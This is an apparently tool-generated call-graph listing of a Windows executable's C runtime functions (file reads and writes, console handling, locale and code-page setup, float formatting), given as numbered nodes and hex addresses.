__read_nolock 55 API calls 6919->6921 7036 407756 6920->7036 6921->6920 6924 4051cc 6923->6924 6925 40516c 6923->6925 6926 4024c9 ___strgtold12_l 55 API calls 6924->6926 6925->6924 6931 405195 6925->6931 6927 4051d1 6926->6927 6928 402495 __read_nolock 55 API calls 6927->6928 6929 4051bd 6928->6929 6929->6781 6930 4051b7 SetStdHandle 6930->6929 6931->6929 6931->6930 6947 404520 LeaveCriticalSection 6932->6947 6934 405096 6934->6818 6936 404f35 __ioinit 6935->6936 6937 404f84 EnterCriticalSection 6936->6937 6938 4043b6 __lock 55 API calls 6936->6938 6939 404faa __ioinit 6937->6939 6940 404f5a 6938->6940 6939->6809 6941 404f72 6940->6941 6942 403de5 __ioinit InitializeCriticalSectionAndSpinCount 6940->6942 6948 404fae 6941->6948 6942->6941 6951 404520 LeaveCriticalSection 6944->6951 6946 40515e 6946->6808 6947->6934 6949 404520 _doexit LeaveCriticalSection 6948->6949 6950 404fb5 6949->6950 6950->6937 6951->6946 6953 4051f1 6952->6953 6954 405206 6952->6954 6955 402495 __read_nolock 55 API calls 6953->6955 6956 402495 __read_nolock 55 API calls 6954->6956 6958 40522b 6954->6958 6957 4051f6 6955->6957 6959 405235 6956->6959 6960 4024c9 ___strgtold12_l 55 API calls 6957->6960 6958->6842 6961 4024c9 ___strgtold12_l 55 API calls 6959->6961 6963 4051fe 6960->6963 6962 40523d 6961->6962 6964 4017ee ___strgtold12_l 8 API calls 6962->6964 6963->6842 6964->6963 6966 40778b __write_nolock 6965->6966 6967 4077e9 6966->6967 6968 4077ca 6966->6968 6997 4077bf 6966->6997 6971 407841 6967->6971 6972 407825 6967->6972 6970 402495 __read_nolock 55 API calls 6968->6970 6969 40412d __setmbcp_nolock 6 API calls 6973 407fdf 6969->6973 6974 4077cf 6970->6974 6976 40785a 6971->6976 6980 4052f5 __lseeki64_nolock 57 API calls 6971->6980 6975 402495 __read_nolock 55 API calls 6972->6975 6973->6884 6977 4024c9 ___strgtold12_l 55 API calls 6974->6977 6979 40782a 6975->6979 7024 404ed5 6976->7024 6981 4077d6 6977->6981 6983 4024c9 ___strgtold12_l 55 API calls 6979->6983 6980->6976 6984 4017ee ___strgtold12_l 8 API calls 6981->6984 6982 407868 6985 407bc1 6982->6985 6990 402f11 __setmbcp 55 API calls 6982->6990 6986 407831 6983->6986 6984->6997 6987 407f54 WriteFile 6985->6987 6988 407bdf 6985->6988 6989 4017ee ___strgtold12_l 8 API calls 6986->6989 6991 407bb4 GetLastError 6987->6991 6996 407b81 6987->6996 6992 407d03 6988->6992 6999 407bf5 6988->6999 6989->6997 6993 407894 GetConsoleMode 6990->6993 6991->6996 7004 407d0e 6992->7004 7016 407df8 6992->7016 6993->6985 6995 4078d3 6993->6995 6994 407f8d 6994->6997 7001 4024c9 ___strgtold12_l 55 API calls 6994->7001 6995->6985 6998 4078e3 GetConsoleCP 6995->6998 6996->6994 6996->6997 7003 407ce1 6996->7003 6997->6969 6998->6994 7022 407912 6998->7022 6999->6994 6999->6996 7000 407c64 WriteFile 6999->7000 7000->6991 7000->6999 7002 407fbb 7001->7002 7005 402495 __read_nolock 55 API calls 7002->7005 7006 407f84 7003->7006 7007 407cec 7003->7007 7004->6994 7004->6996 7009 407d73 WriteFile 7004->7009 7005->6997 7011 4024a8 __dosmaperr 55 API calls 7006->7011 7010 4024c9 ___strgtold12_l 55 API calls 7007->7010 7008 407e6d WideCharToMultiByte 7008->6991 7008->7016 7009->6991 7009->7004 7012 407cf1 7010->7012 7011->6997 7014 402495 __read_nolock 55 API calls 7012->7014 7013 407ebc WriteFile 7013->7016 7017 407f0f GetLastError 7013->7017 7014->6997 7016->6994 7016->6996 7016->7008 7016->7013 7017->7016 7018 409279 WriteConsoleW CreateFileW __putwch_nolock 7018->7022 7019 409261 57 API calls __write_nolock 7019->7022 7020 4079fb WideCharToMultiByte 7020->6996 7021 407a36 WriteFile 7020->7021 7021->6991 7021->7022 7022->6991 7022->6996 7022->7018 7022->7019 7022->7020 7023 407a90 WriteFile 7022->7023 7033 40915b 7022->7033 7023->6991 7023->7022 7025 404ee0 7024->7025 7026 404eed 7024->7026 7027 4024c9 ___strgtold12_l 55 API calls 7025->7027 7028 404ef9 7026->7028 7029 4024c9 ___strgtold12_l 55 API calls 7026->7029 7030 404ee5 7027->7030 7028->6982 7031 404f1a 7029->7031 7030->6982 7032 4017ee ___strgtold12_l 8 API calls 7031->7032 7032->7030 7034 409121 __isleadbyte_l 55 API calls 7033->7034 7035 409168 7034->7035 7035->7022 7039 4052cf LeaveCriticalSection 7036->7039 7038 40775c 7038->6918 7039->7038 7040->6792 7042 401aa5 LeaveCriticalSection 7041->7042 7043 401a86 7041->7043 7042->6587 7043->7042 7044 401a8d 7043->7044 7047 404520 LeaveCriticalSection 7044->7047 7046 401aa2 7046->6587 7047->7046 7049 4013a8 __ioinit 7048->7049 7050 4013eb 7049->7050 7051 4013be _memset 7049->7051 7053 4013e3 __ioinit 7049->7053 7061 401a08 7050->7061 7055 4024c9 ___strgtold12_l 55 API calls 7051->7055 7053->6535 7057 4013d8 7055->7057 7059 4017ee ___strgtold12_l 8 API calls 7057->7059 7059->7053 7062 401a18 7061->7062 7063 401a3a EnterCriticalSection 7061->7063 7062->7063 7064 401a20 7062->7064 7065 4013f1 7063->7065 7066 4043b6 __lock 55 API calls 7064->7066 7067 4011bc 7065->7067 7066->7065 7071 4011d7 _memset 7067->7071 7073 4011f2 7067->7073 7068 4011e2 7069 4024c9 ___strgtold12_l 55 API calls 7068->7069 7070 4011e7 7069->7070 7072 4017ee ___strgtold12_l 8 API calls 7070->7072 7071->7068 7071->7073 7078 401232 7071->7078 7072->7073 7081 401425 7073->7081 7075 401343 _memset 7079 4024c9 ___strgtold12_l 55 API calls 7075->7079 7078->7073 7078->7075 7084 401ade 7078->7084 7098 40194a 7078->7098 7105 401d04 7078->7105 7171 401829 7078->7171 7079->7070 7082 401a77 __wfsopen 2 API calls 7081->7082 7083 40142b 7082->7083 7083->7053 7085 401aed 7084->7085 7093 401ae9 _memmove 7084->7093 7086 401af4 7085->7086 7090 401b07 _memset 7085->7090 7087 4024c9 ___strgtold12_l 55 API calls 7086->7087 7088 401af9 7087->7088 7089 4017ee ___strgtold12_l 8 API calls 7088->7089 7089->7093 7091 401b35 7090->7091 7092 401b3e 7090->7092 7090->7093 7094 4024c9 ___strgtold12_l 55 API calls 7091->7094 7092->7093 7096 4024c9 ___strgtold12_l 55 API calls 7092->7096 7093->7078 7095 401b3a 7094->7095 7097 4017ee ___strgtold12_l 8 API calls 7095->7097 7096->7095 7097->7093 7099 401954 7098->7099 7100 401969 7098->7100 7101 4024c9 ___strgtold12_l 55 API calls 7099->7101 7100->7078 7102 401959 7101->7102 7103 4017ee ___strgtold12_l 8 API calls 7102->7103 7104 401964 7103->7104 7104->7078 7106 401d25 7105->7106 7107 401d3c 7105->7107 7108 402495 __read_nolock 55 API calls 7106->7108 7109 402474 7107->7109 7114 401d76 7107->7114 7110 401d2a 7108->7110 7111 402495 __read_nolock 55 API calls 7109->7111 7113 4024c9 ___strgtold12_l 55 API calls 7110->7113 7112 402479 7111->7112 7115 4024c9 ___strgtold12_l 55 API calls 7112->7115 7153 401d31 7113->7153 7116 401d7e 7114->7116 7121 401d95 7114->7121 7117 401d8a 7115->7117 7118 402495 __read_nolock 55 API calls 7116->7118 7120 4017ee ___strgtold12_l 8 API calls 7117->7120 7119 401d83 7118->7119 7123 4024c9 ___strgtold12_l 55 API calls 7119->7123 7120->7153 7122 401daa 7121->7122 7125 401dc4 7121->7125 7126 401de2 7121->7126 7121->7153 7124 402495 __read_nolock 55 API calls 7122->7124 7123->7117 7124->7119 7125->7122 7130 401dcf 7125->7130 7127 4045b5 __malloc_crt 55 API calls 7126->7127 7128 401df2 7127->7128 7131 401e15 7128->7131 7132 401dfa 7128->7132 7129 404ed5 __read_nolock 55 API calls 7133 401ee3 7129->7133 7130->7129 7136 4052f5 __lseeki64_nolock 57 API calls 7131->7136 7134 4024c9 ___strgtold12_l 55 API calls 7132->7134 7135 401f5c ReadFile 7133->7135 7140 401ef9 GetConsoleMode 7133->7140 7137 401dff 7134->7137 7138 40243c GetLastError 7135->7138 7139 401f7e 7135->7139 7136->7130 7141 402495 __read_nolock 55 API calls 7137->7141 7142 401f3c 7138->7142 7143 402449 7138->7143 7139->7138 7147 401f4e 7139->7147 7144 401f59 7140->7144 7145 401f0d 7140->7145 7141->7153 7151 4024a8 __dosmaperr 55 API calls 7142->7151 7155 401f42 7142->7155 7146 4024c9 ___strgtold12_l 55 API calls 7143->7146 7144->7135 7145->7144 7148 401f13 ReadConsoleW 7145->7148 7149 40244e 7146->7149 7147->7155 7163 401fb3 7147->7163 7166 402220 7147->7166 7148->7147 7150 401f36 GetLastError 7148->7150 7152 402495 __read_nolock 55 API calls 7149->7152 7150->7142 7151->7155 7152->7155 7153->7078 7154 404535 _free 55 API calls 7154->7153 7155->7153 7155->7154 7157 40201f ReadFile 7158 402040 GetLastError 7157->7158 7157->7163 7158->7163 7159 40215d 7167 40210d MultiByteToWideChar 7159->7167 7168 4052f5 __lseeki64_nolock 57 API calls 7159->7168 7160 40214d 7164 4024c9 ___strgtold12_l 55 API calls 7160->7164 7161 402326 ReadFile 7165 402349 GetLastError 7161->7165 7161->7166 7162 4020a0 7162->7155 7162->7159 7162->7160 7162->7167 7163->7157 7163->7162 7169 4052f5 __lseeki64_nolock 57 API calls 7163->7169 7164->7155 7165->7166 7166->7155 7166->7161 7170 4052f5 __lseeki64_nolock 57 API calls 7166->7170 7167->7150 7167->7155 7168->7167 7169->7163 7170->7166 7172 401834 7171->7172 7176 401849 7171->7176 7173 4024c9 ___strgtold12_l 55 API calls 7172->7173 7174 401839 7173->7174 7175 4017ee ___strgtold12_l 8 API calls 7174->7175 7183 401844 7175->7183 7177 40187e 7176->7177 7176->7183 7191 40413c 7176->7191 7179 40194a __fflush_nolock 55 API calls 7177->7179 7180 401892 7179->7180 7194 401bf0 7180->7194 7182 401899 7182->7183 7184 40194a __fflush_nolock 55 API calls 7182->7184 7183->7078 7185 4018bc 7184->7185 7185->7183 7186 40194a __fflush_nolock 55 API calls 7185->7186 7187 4018c8 7186->7187 7187->7183 7188 40194a __fflush_nolock 55 API calls 7187->7188 7189 4018d5 7188->7189 7190 40194a __fflush_nolock 55 API calls 7189->7190 7190->7183 7192 4045b5 __malloc_crt 55 API calls 7191->7192 7193 404151 7192->7193 7193->7177 7195 401bfc __ioinit 7194->7195 7196 401c20 7195->7196 7197 401c09 7195->7197 7199 401ce4 7196->7199 7201 401c34 7196->7201 7198 402495 __read_nolock 55 API calls 7197->7198 7200 401c0e 7198->7200 7202 402495 __read_nolock 55 API calls 7199->7202 7204 4024c9 ___strgtold12_l 55 API calls 7200->7204 7205 401c52 7201->7205 7206 401c5f 7201->7206 7203 401c57 7202->7203 7212 4024c9 ___strgtold12_l 55 API calls 7203->7212 7207 401c15 __ioinit 7204->7207 7208 402495 __read_nolock 55 API calls 7205->7208 7209 401c81 7206->7209 7210 401c6c 7206->7210 7207->7182 7208->7203 7211 404f29 ___lock_fhandle 56 API calls 7209->7211 7213 402495 __read_nolock 55 API calls 7210->7213 7214 401c87 7211->7214 7218 401c79 7212->7218 7215 401c71 7213->7215 7216 401c9a 7214->7216 7217 401cad 7214->7217 7219 4024c9 ___strgtold12_l 55 API calls 7215->7219 7220 401d04 __read_nolock 67 API calls 7216->7220 7222 4024c9 ___strgtold12_l 55 API calls 7217->7222 7221 4017ee ___strgtold12_l 8 API calls 7218->7221 7219->7218 7223 401ca6 7220->7223 7221->7207 7224 401cb2 7222->7224 7227 401cdc 7223->7227 7225 402495 __read_nolock 55 API calls 7224->7225 7225->7223 7230 4052cf LeaveCriticalSection 7227->7230 7229 401ce2 7229->7207 7230->7229 7234 40329c 7231->7234 7233 403143 7235 4032a8 __ioinit 7234->7235 7236 4043b6 __lock 48 API calls 7235->7236 7237 4032af 7236->7237 7238 4032dd DecodePointer 7237->7238 7241 403368 _doexit 7237->7241 7240 4032f4 DecodePointer 7238->7240 7238->7241 7253 403304 7240->7253 7254 4033b6 7241->7254 7243 4033c5 __ioinit 7243->7233 7245 403311 EncodePointer 7245->7253 7246 4033ad 7247 403112 _fast_error_exit 3 API calls 7246->7247 7249 4033b6 7247->7249 7248 403321 DecodePointer EncodePointer 7252 403333 DecodePointer DecodePointer 7248->7252 7250 4033c3 7249->7250 7259 404520 LeaveCriticalSection 7249->7259 7250->7233 7252->7253 7253->7241 7253->7245 7253->7248 7255 403396 7254->7255 7256 4033bc 7254->7256 7255->7243 7258 404520 LeaveCriticalSection 7255->7258 7260 404520 LeaveCriticalSection 7256->7260 7258->7246 7259->7250 7260->7255 7417 40866d 7418 408679 __ioinit 7417->7418 7419 4043b6 __lock 55 API calls 7418->7419 7421 4086b0 __ioinit 7418->7421 7420 40868d 7419->7420 7422 40646b __updatetlocinfoEx_nolock 55 API calls 7420->7422 7423 40869d 7422->7423 7425 4086b6 7423->7425 7428 404520 LeaveCriticalSection 7425->7428 7427 4086bd 7427->7421 7428->7427 7429 40196e 7430 40197b 7429->7430 7431 40456d __calloc_crt 55 API calls 7430->7431 7432 401995 7431->7432 7433 4019ae 7432->7433 7434 40456d __calloc_crt 55 API calls 7432->7434 7434->7433 7435 402b70 7436 402b82 7435->7436 7438 402b90 @_EH4_CallFilterFunc@8 7435->7438 7437 40412d __setmbcp_nolock 6 API calls 7436->7437 7437->7438 7825 402c32 7826 402c67 7825->7826 7827 402c42 7825->7827 7827->7826 7832 406117 7827->7832 7833 406123 __ioinit 7832->7833 7834 402f11 __setmbcp 55 API calls 7833->7834 7835 406128 7834->7835 7838 4086bf 7835->7838 7839 4086c4 _abort 7838->7839 7840 4086cf 7839->7840 7848 406d6e 7839->7848 7842 4086d9 IsProcessorFeaturePresent 7840->7842 7847 4086f7 7840->7847 7843 4086e4 7842->7843 7846 401691 __call_reportfault 7 API calls 7843->7846 7844 4031e6 _raise 55 API calls 7845 408701 7844->7845 7846->7847 7847->7844 7853 406d7a __ioinit 7848->7853 7849 406de4 7852 406df3 7849->7852 7855 406db0 _siglookup 7849->7855 7850 406dab 7851 402f29 __getptd_noexit 55 API calls 7850->7851 7851->7855 7854 4024c9 ___strgtold12_l 55 API calls 7852->7854 7853->7849 7853->7850 7853->7852 7853->7855 7856 406df8 7854->7856 7858 406e51 7855->7858 7859 4031e6 _raise 55 API calls 7855->7859 7865 406db9 __ioinit 7855->7865 7857 4017ee ___strgtold12_l 8 API calls 7856->7857 7857->7865 7860 4043b6 __lock 55 API calls 7858->7860 7862 406e5c 7858->7862 7859->7858 7860->7862 7861 406ebe EncodePointer 7863 406e91 7861->7863 7862->7861 7862->7863 7866 406eef 7863->7866 7865->7840 7867 406ef3 7866->7867 7868 406efa 7866->7868 7870 404520 LeaveCriticalSection 7867->7870 7868->7865 7870->7868 7439 40b2f3 7442 40b304 7439->7442 7443 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7442->7443 7444 40b316 7443->7444 7451 40b781 7444->7451 7446 40b322 7447 40b336 7446->7447 7456 40b613 7446->7456 7448 40b781 __forcdecpt_l 62 API calls 7447->7448 7450 40b300 7448->7450 7452 40b78d 7451->7452 7453 40b79f 7451->7453 7452->7446 7461 40b63e 7453->7461 7457 40b630 7456->7457 7458 40b61f 7456->7458 7539 40b5c1 7457->7539 7458->7446 7462 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7461->7462 7463 40b651 7462->7463 7464 40b6bd 7463->7464 7465 40b65d 7463->7465 7466 40b6db 7464->7466 7480 409121 7464->7480 7472 40b672 7465->7472 7473 40c2fc 7465->7473 7468 4024c9 ___strgtold12_l 55 API calls 7466->7468 7470 40b6e1 7466->7470 7468->7470 7483 408de9 7470->7483 7472->7446 7474 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7473->7474 7475 40c30e 7474->7475 7476 409121 __isleadbyte_l 55 API calls 7475->7476 7479 40c31b 7475->7479 7477 40c33f 7476->7477 7488 408f45 7477->7488 7479->7472 7481 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7480->7481 7482 409132 7481->7482 7482->7466 7484 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7483->7484 7485 408dfa 7484->7485 7510 408be5 7485->7510 7489 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7488->7489 7490 408f56 7489->7490 7493 408e4d 7490->7493 7494 408e74 MultiByteToWideChar 7493->7494 7495 408e67 7493->7495 7496 408e99 7494->7496 7498 408ea0 7494->7498 7495->7494 7497 40412d __setmbcp_nolock 6 API calls 7496->7497 7499 408f41 7497->7499 7501 407fe3 _malloc 55 API calls 7498->7501 7504 408ec2 _memset __crtLCMapStringA_stat 7498->7504 7499->7479 7500 408efe MultiByteToWideChar 7502 408f28 7500->7502 7503 408f18 GetStringTypeW 7500->7503 7501->7504 7506 408e2f 7502->7506 7503->7502 7504->7496 7504->7500 7507 408e39 7506->7507 7508 408e4a 7506->7508 7507->7508 7509 404535 _free 55 API calls 7507->7509 7508->7496 7509->7508 7512 408bfe MultiByteToWideChar 7510->7512 7513 408c5d 7512->7513 7515 408c64 7512->7515 7514 40412d __setmbcp_nolock 6 API calls 7513->7514 7516 408de5 7514->7516 7522 407fe3 _malloc 55 API calls 7515->7522 7524 408c8c __crtLCMapStringA_stat 7515->7524 7516->7472 7517 408cc3 MultiByteToWideChar 7518 408d2a 7517->7518 7519 408cdc 7517->7519 7521 408e2f __freea 55 API calls 7518->7521 7535 409037 7519->7535 7521->7513 7522->7524 7523 408cf0 7523->7518 7525 408d06 7523->7525 7527 408d32 7523->7527 7524->7513 7524->7517 7525->7518 7526 409037 __crtLCMapStringA_stat LCMapStringW 7525->7526 7526->7518 7529 407fe3 _malloc 55 API calls 7527->7529 7533 408d5a __crtLCMapStringA_stat 7527->7533 7528 409037 __crtLCMapStringA_stat LCMapStringW 7530 408d9d 7528->7530 7529->7533 7531 408dc5 7530->7531 7534 408db7 WideCharToMultiByte 7530->7534 7532 408e2f __freea 55 API calls 7531->7532 7532->7518 7533->7518 7533->7528 7534->7531 7536 409062 __crtLCMapStringA_stat 7535->7536 7537 409047 7535->7537 7538 409079 LCMapStringW 7536->7538 7537->7523 7538->7523 7540 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7539->7540 7541 40b5d2 7540->7541 7542 40b5e9 7541->7542 7543 40c2fc __isctype_l 58 API calls 7541->7543 7542->7446 7543->7542 7580 409615 7581 40961c __cfltcvt_init 7580->7581 7582 409627 7581->7582 7584 40b3ba 7581->7584 7590 40c29f 7584->7590 7586 40b3cd 7587 40b3d4 7586->7587 7588 4017fe __invoke_watson 8 API calls 7586->7588 7587->7582 7589 40b3e0 7588->7589 7591 40c2bb __control87 7590->7591 7595 40c2db __control87 7590->7595 7592 4024c9 ___strgtold12_l 55 API calls 7591->7592 7593 40c2d1 7592->7593 7594 4017ee ___strgtold12_l 8 API calls 7593->7594 7594->7595 7595->7586 7871 408fb6 7872 403128 __lock 55 API calls 7871->7872 7873 408fbd 7872->7873 7874 401637 7875 401646 7874->7875 7876 40164c 7874->7876 7878 4031e6 _raise 55 API calls 7875->7878 7880 403144 7876->7880 7878->7876 7879 401651 __ioinit 7881 40329c _doexit 55 API calls 7880->7881 7882 40314f 7881->7882 7882->7879 7883 4064b7 7886 406813 7883->7886 7885 4064c6 7887 40681f __ioinit 7886->7887 7888 402f11 __setmbcp 55 API calls 7887->7888 7889 406827 7888->7889 7890 40676d __setmbcp 55 API calls 7889->7890 7891 406831 7890->7891 7911 40650e 7891->7911 7894 4045b5 __malloc_crt 55 API calls 7895 406853 7894->7895 7896 406980 __ioinit 7895->7896 7918 4069bb 7895->7918 7896->7885 7899 406990 7899->7896 7902 4069a3 7899->7902 7904 404535 _free 55 API calls 7899->7904 7900 406889 7901 4068a9 7900->7901 7903 404535 _free 55 API calls 7900->7903 7901->7896 7906 4043b6 __lock 55 API calls 7901->7906 7905 4024c9 ___strgtold12_l 55 API calls 7902->7905 7903->7901 7904->7902 7905->7896 7907 4068d8 7906->7907 7908 406966 7907->7908 7910 404535 _free 55 API calls 7907->7910 7928 406985 7908->7928 7910->7908 7912 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7911->7912 7913 40651e 7912->7913 7914 40652d GetOEMCP 7913->7914 7915 40653f 7913->7915 7916 406556 7914->7916 7915->7916 7917 406544 GetACP 7915->7917 7916->7894 7916->7896 7917->7916 7919 40650e getSystemCP 57 API calls 7918->7919 7921 4069d8 7919->7921 7920 4069df setSBCS 7922 40412d __setmbcp_nolock 6 API calls 7920->7922 7921->7920 7924 406a29 IsValidCodePage 7921->7924 7926 406a4e _memset __setmbcp_nolock 7921->7926 7923 40687a 7922->7923 7923->7899 7923->7900 7924->7920 7925 406a3b GetCPInfo 7924->7925 7925->7920 7925->7926 7931 4065db GetCPInfo 7926->7931 7941 404520 LeaveCriticalSection 7928->7941 7930 40698c 7930->7896 7937 406613 7931->7937 7940 4066bd 7931->7940 7932 408f45 ___crtGetStringTypeA 58 API calls 7933 406674 7932->7933 7935 408de9 ___crtLCMapStringA 59 API calls 7933->7935 7934 40412d __setmbcp_nolock 6 API calls 7936 406769 7934->7936 7938 406695 7935->7938 7936->7920 7937->7932 7939 408de9 ___crtLCMapStringA 59 API calls 7938->7939 7939->7940 7940->7934 7941->7930 7596 40b299 7599 40b2b1 7596->7599 7600 40b2c2 7599->7600 7601 40b2db 7599->7601 7605 409539 7600->7605 7614 4095c7 7601->7614 7604 40b2ac 7606 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7605->7606 7607 40955d 7606->7607 7617 40a174 7607->7617 7612 40412d __setmbcp_nolock 6 API calls 7613 4095c3 7612->7613 7613->7604 7629 409495 7614->7629 7618 40a1bc 7617->7618 7624 40a1cc ___mtold12 7617->7624 7619 4024c9 ___strgtold12_l 55 API calls 7618->7619 7620 40a1c1 7619->7620 7621 4017ee ___strgtold12_l 8 API calls 7620->7621 7621->7624 7622 40412d __setmbcp_nolock 6 API calls 7623 409575 7622->7623 7625 409690 7623->7625 7624->7622 7628 4096e8 7625->7628 7626 40412d __setmbcp_nolock 6 API calls 7627 409582 7626->7627 7627->7612 7628->7626 7630 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7629->7630 7631 4094c2 7630->7631 7632 40a174 ___strgtold12_l 55 API calls 7631->7632 7633 4094da 7632->7633 7638 409c02 7633->7638 7636 40412d __setmbcp_nolock 6 API calls 7637 409535 7636->7637 7637->7604 7641 409c5a 7638->7641 7639 40412d __setmbcp_nolock 6 API calls 7640 4094f7 7639->7640 7640->7636 7641->7639 7942 40613b 7943 40613e 7942->7943 7944 4086bf _abort 57 API calls 7943->7944 7945 40614a 7944->7945 7261 404d5c IsProcessorFeaturePresent 7262 404d82 7261->7262 7263 402ddc 7265 402de8 __ioinit 7263->7265 7264 402e01 7267 402e10 7264->7267 7269 404535 _free 55 API calls 7264->7269 7265->7264 7266 404535 _free 55 API calls 7265->7266 7268 402ef0 __ioinit 7265->7268 7266->7264 7270 402e1f 7267->7270 7271 404535 _free 55 API calls 7267->7271 7269->7267 7272 404535 _free 55 API calls 7270->7272 7274 402e2e 7270->7274 7271->7270 7272->7274 7273 404535 _free 55 API calls 7275 402e3d 7273->7275 7274->7273 7274->7275 7276 404535 _free 55 API calls 7275->7276 7277 402e4c 7275->7277 7276->7277 7278 402e5b 7277->7278 7279 404535 _free 55 API calls 7277->7279 7280 402e6d 7278->7280 7281 404535 _free 55 API calls 7278->7281 7279->7278 7282 4043b6 __lock 55 API calls 7280->7282 7281->7280 7285 402e75 7282->7285 7283 402e98 7295 402efc 7283->7295 7285->7283 7287 404535 _free 55 API calls 7285->7287 7287->7283 7288 4043b6 __lock 55 API calls 7293 402eac ___removelocaleref 7288->7293 7289 402edd 7298 402f08 7289->7298 7292 404535 _free 55 API calls 7292->7268 7293->7289 7294 4061f1 ___freetlocinfo 55 API calls 7293->7294 7294->7289 7301 404520 LeaveCriticalSection 7295->7301 7297 402ea5 7297->7288 7302 404520 LeaveCriticalSection 7298->7302 7300 402eea 7300->7292 7301->7297 7302->7300 7642 40a91c 7645 40a93d 7642->7645 7644 40a938 7646 40a9a7 7645->7646 7647 40a948 7645->7647 7713 40ae8e 7646->7713 7647->7646 7649 40a94d 7647->7649 7650 40a952 7649->7650 7651 40a96b 7649->7651 7659 40b048 7650->7659 7652 40a98e 7651->7652 7655 40a975 7651->7655 7700 40a9c3 7652->7700 7678 40b109 7655->7678 7658 40a98c 7658->7644 7730 40c10f 7659->7730 7662 40b08d 7665 40b0a5 7662->7665 7666 40b095 7662->7666 7663 40b07d 7664 4024c9 ___strgtold12_l 55 API calls 7663->7664 7667 40b082 7664->7667 7742 40bf97 7665->7742 7668 4024c9 ___strgtold12_l 55 API calls 7666->7668 7669 4017ee ___strgtold12_l 8 API calls 7667->7669 7670 40b09a 7668->7670 7672 40b089 7669->7672 7673 4017ee ___strgtold12_l 8 API calls 7670->7673 7676 40412d __setmbcp_nolock 6 API calls 7672->7676 7673->7672 7674 40b0d8 7674->7672 7751 40af5c 7674->7751 7677 40a966 7676->7677 7677->7644 7679 40c10f __fltout2 55 API calls 7678->7679 7680 40b137 7679->7680 7681 40b151 7680->7681 7682 40b13e 7680->7682 7684 40b159 7681->7684 7685 40b16c 7681->7685 7683 4024c9 ___strgtold12_l 55 API calls 7682->7683 7686 40b143 7683->7686 7687 4024c9 ___strgtold12_l 55 API calls 7684->7687 7689 40bf97 __fptostr 55 API calls 7685->7689 7690 4017ee ___strgtold12_l 8 API calls 7686->7690 7688 40b15e 7687->7688 7691 4017ee ___strgtold12_l 8 API calls 7688->7691 7692 40b198 7689->7692 7693 40b14a 7690->7693 7691->7693 7692->7693 7695 40b1de 7692->7695 7698 40b1b8 7692->7698 7694 40412d __setmbcp_nolock 6 API calls 7693->7694 7697 40b204 7694->7697 7780 40ad3d 7695->7780 7697->7658 7699 40af5c __cftof2_l 55 API calls 7698->7699 7699->7693 7701 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7700->7701 7702 40a9e8 7701->7702 7703 40a9ff 7702->7703 7704 40aa08 7702->7704 7705 4024c9 ___strgtold12_l 55 API calls 7703->7705 7707 40aa11 7704->7707 7710 40aa25 7704->7710 7706 40aa04 7705->7706 7709 4017ee ___strgtold12_l 8 API calls 7706->7709 7708 4024c9 ___strgtold12_l 55 API calls 7707->7708 7708->7706 7712 40aa20 _memset __alldvrm __cftoa_l _strrchr 7709->7712 7710->7712 7812 40ad1f 7710->7812 7712->7658 7714 40c10f __fltout2 55 API calls 7713->7714 7715 40aec0 7714->7715 7716 40aed7 7715->7716 7717 40aec7 7715->7717 7719 40aede 7716->7719 7722 40aee8 7716->7722 7718 4024c9 ___strgtold12_l 55 API calls 7717->7718 7720 40aecc 7718->7720 7721 4024c9 ___strgtold12_l 55 API calls 7719->7721 7723 4017ee ___strgtold12_l 8 API calls 7720->7723 7721->7720 7724 40bf97 __fptostr 55 API calls 7722->7724 7725 40aed3 7723->7725 7726 40af28 7724->7726 7728 40412d __setmbcp_nolock 6 API calls 7725->7728 7726->7725 7727 40ad3d __cftoe2_l 55 API calls 7726->7727 7727->7725 7729 40af58 7728->7729 7729->7658 7731 40c138 ___dtold 7730->7731 7758 40c3ad 7731->7758 7736 40c190 7739 4017fe __invoke_watson 8 API calls 7736->7739 7737 40c17a 7738 40412d __setmbcp_nolock 6 API calls 7737->7738 7740 40b076 7738->7740 7741 40c19c 7739->7741 7740->7662 7740->7663 7743 40bfa9 7742->7743 7744 40bfbf 7742->7744 7745 4024c9 ___strgtold12_l 55 API calls 7743->7745 7744->7743 7747 40bfc5 7744->7747 7749 40bfae 7745->7749 7746 4017ee ___strgtold12_l 8 API calls 7750 40bfb8 _memmove _strlen 7746->7750 7748 4024c9 ___strgtold12_l 55 API calls 7747->7748 7747->7750 7748->7749 7749->7746 7750->7674 7752 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7751->7752 7753 40af79 7752->7753 7754 4024c9 ___strgtold12_l 55 API calls 7753->7754 7757 40af95 _memset __shift 7753->7757 7755 40af8b 7754->7755 7756 4017ee ___strgtold12_l 8 API calls 7755->7756 7756->7757 7757->7672 7761 40c402 7758->7761 7759 40c474 7763 40b7ad __fltout2 55 API calls 7759->7763 7760 40412d __setmbcp_nolock 6 API calls 7762 40c153 7760->7762 7761->7759 7765 40c48d 7761->7765 7770 40c414 7761->7770 7771 40b7ad 7762->7771 7763->7770 7764 40cd49 7766 4017fe __invoke_watson 8 API calls 7764->7766 7767 40b7ad __fltout2 55 API calls 7765->7767 7768 40cd80 7766->7768 7767->7770 7769 40c425 7769->7760 7770->7764 7770->7769 7772 40b7b8 7771->7772 7774 40b7c6 7771->7774 7772->7774 7777 40b7dc 7772->7777 7773 4024c9 ___strgtold12_l 55 API calls 7775 40b7cd 7773->7775 7774->7773 7776 4017ee ___strgtold12_l 8 API calls 7775->7776 7778 40b7d7 7776->7778 7777->7778 7779 4024c9 ___strgtold12_l 55 API calls 7777->7779 7778->7736 7778->7737 7779->7775 7781 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 7780->7781 7782 40ad50 7781->7782 7783 40ad5d 7782->7783 7784 40ad66 7782->7784 7785 4024c9 ___strgtold12_l 55 API calls 7783->7785 7787 40ad7b 7784->7787 7790 40ad8f __shift 7784->7790 7786 40ad62 7785->7786 7789 4017ee ___strgtold12_l 8 API calls 7786->7789 7788 4024c9 ___strgtold12_l 55 API calls 7787->7788 7788->7786 7797 40ad8a _memmove 7789->7797 7791 40b7ad __fltout2 55 API calls 7790->7791 7792 40ae06 7791->7792 